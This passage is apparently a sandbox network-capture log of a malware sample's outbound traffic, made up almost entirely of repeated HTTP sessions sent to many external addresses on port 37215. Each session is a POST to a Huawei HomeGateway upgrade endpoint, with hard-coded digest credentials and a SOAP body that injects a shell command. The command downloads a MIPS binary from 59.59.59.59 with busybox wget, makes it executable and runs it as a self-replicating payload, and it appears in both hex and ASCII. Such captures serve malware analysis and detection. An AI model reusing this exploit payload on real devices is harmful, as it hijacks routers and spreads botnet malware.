70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          166192.168.2.1539020197.206.192.3837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:45.543826103 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          167192.168.2.1533998157.123.255.21837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:45.543844938 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          168192.168.2.1545750157.224.24.9437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:45.543920040 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          169192.168.2.1549568157.228.120.20437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:45.543962002 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          170192.168.2.1542320197.76.141.14737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:45.543963909 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          171192.168.2.1537058197.139.59.9537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:45.543982983 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          172192.168.2.1544614157.238.35.14937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:45.543989897 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          173192.168.2.1537934197.15.230.1437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:45.543989897 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          174192.168.2.1556350118.232.46.16437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:45.543989897 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          175192.168.2.155617641.227.92.17037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:45.543989897 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          176192.168.2.154213241.66.66.6737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:45.543999910 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
